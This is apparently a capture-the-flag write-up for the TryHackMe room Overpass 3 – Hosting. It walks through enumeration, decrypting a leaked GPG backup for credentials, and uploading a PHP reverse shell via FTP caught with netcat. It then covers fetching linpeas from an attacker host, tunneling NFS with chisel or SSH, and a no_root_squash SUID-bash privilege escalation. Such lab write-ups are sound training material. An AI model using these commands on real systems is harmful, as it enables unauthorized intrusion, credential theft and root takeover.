Overpass 3-Hosting-TryHackMe
Please read this write-up here:-
This is the write-up for TryHackMe's room named Overpass3 - Hosting. This is the third part of the series of rooms named Overpass.
This room can be found at this URL:- https://tryhackme.com/room/overpass3hosting
So lets begin.
Enumeration
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.163.156
# Perform further information gathering on the open ports identified above
sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.163.156
Port 21 FTP vsftpd 3.0.3 doesn't have any know vulnerabilities and there is no anonymous access.
Port 22 SSH OpenSSH 8.0 is also quite recent. So lets keep it for later.
Port 80 have an Apache Web Server, so lets first try to brute force the directories on the Web Server.
Directory Busting
Lets use gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.163.156 -t 40
Ah, we have a folder named "backups". So lets browse to that folder using our favorite browser.
Ah, we have a folder named "backups". So lets browse to that folder using our favorite browser.
Download "backup.zip" file which we found above and unzip it.We found 2 files:
- CustomerDetails.xlsx.gpg
- priv.key
OK,So we have a file encrypted with a gpg key. Let use the following command to get the actual file:
gpg --import priv.key
gpg CustomerDetails.xlsx.gpg
Reverse Shell
Try these credentials with FTP and we will find that user "paradox" works.We can also see that the ftp directory allows us to upload files. We will upload a php reverse shell,execute it and will catch it with netcat.ftp 10.10.163.156
put php-reverse-shell.php
Get the php reverse shell from:- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and update it with your own attacker machine IP address and the port you want to catch the reverse shell.
Access web shell from the browser as:
http://10.10.163.156/php-reverse-shell.php
Catch the reverse shell as:nc -nlvp 9999
/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm
Now we have a fully working shell with "apache" user.Web Flag
The web flag was a bit difficult to find, but ultimately found it using
find / -name *web* 2>/dev/null
Privilege Escalation
Now we have a stable shell,it is time to do privilege escalation. Transfer "linpeas.sh" to the target and run it to see if we can find anything that can help us in escalating our privileges:
On Attacker box:
python3 -m http.server
On Target box:
cd /tmp; curl http://YOUR-IP:8000/linpeas.sh > linpeas.sh
chmod +x linpeas.sh
./linpeash.sh
Get the latest linpeas.sh from:- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
Running linpeas.sh reveals few interesting things.
First:
So there is our know user "paradox" which also have a console,so may be reusing the password discovered from CustomerDetails.xlsx we can escalate to user "paradox".
su paradox
So the user "james" have a NFS setup with "no_root_squash".Linpeas is clearly indicating that this is a potential Privilege Escalation vector and if we following the link given we can find how to exploit it:- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
If we run showmount from out attacking box on to the target,we get an error:
If we run showmount from out attacking box on to the target,we get an error:
showmount -e 10.10.119.118
From the man page of showmount:- show mount information for an NFS server.Also the port which is usually used for NFS is 2049.Our initial NMAP scan also didn't revealed this port and show mount is giving us error. This indicates that something is blocking NFS. Lets confirm that if it is at all running on the target . We can transfer "netstat" from /usr/bin/ on kali box on to the target as both are 64 bit targets. Transfer netstat exe on to the target and run it like:
./netstat -tulnp
This confirms that NFS service is running on target but we cannot reach to it from our kali machine. So we can try tunneling to reach to NFS. Transferring dynamic exes may or may not work because of dependencies issues. An alternative method is to check the open tcp or udp ports by using the proc file system using command:
cat /proc/net/tcp
cat /proc/net/udp
Tunneling
We will use an awesome tool called chisel to do our pivoting/tunneling.You can get the tool from here and build it using very simple instructions given in the tool's description: https://github.com/jpillora/chisel
Build and transfer chisel on to the target machine and run it on the kali and on the target as:
Build and transfer chisel on to the target machine and run it on the kali and on the target as:
On kali:
./chisel server -p 8000 --reverse -v
./chisel client 10.8.98.192:8000 R:2049:127.0.0.1:2049
This syntax deserves little bit of explanation. On the target - chisel is running as a client talking to the server(kali machine) at 10.221.98.192:8000 and forwarding the NFS port 2049 on 127.0.0.1 i.e. on the target on to the "R" reverse port i.e. port 2049 on kali machine.
Now from kali access the NFS port like:
Now from kali access the NFS port like:
sudo mount -vvvv -t nfs4 127.0.0.1:/ /mnt
Here little bit of research was required to access the nfs as it was version 4 and the mount syntax was also bit different to old nfs version. We were able mount /home/james on to /mnt on our attacking kali machine and got our user flag.
Now from here it is quite trivial to get the root.From kali machine,copy the bash binary as root and also give execute permissions to all for the bash binary as well as add a suid bit on bash and just run the binary on the target with "p" flag to get root.
On kali:
sudo chmod 777 /mnt
sudo cp /bin/bash /mnt
sudo chmod +s /mnt/bash
/home/james/bash -p
cat /root/root.flag
We can also use SSH to do our tunneling. We need to create SSH keys pair on kali as the "paradox" user. We can make a dummy user paradox on kali and can create these keys using:
ssh-keygen
Then transfer id_rsa.pub on to target directory /home/paradox/.ssh and then on the target run:
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
chmod 644 id_rsa.pub
ssh -f -N -L 2049:localhost:2049 paradox@10.10.233.138 -i id_rsa
And mount the nfs directory as we did previously. Rest of the steps to get the root shell are same as in the above method where we used chisel for tunneling.
This was indeed a fun room and I enjoyed working on it. Hope you find this write up useful. Thanks for reading and have a good day :)
Comments
Post a Comment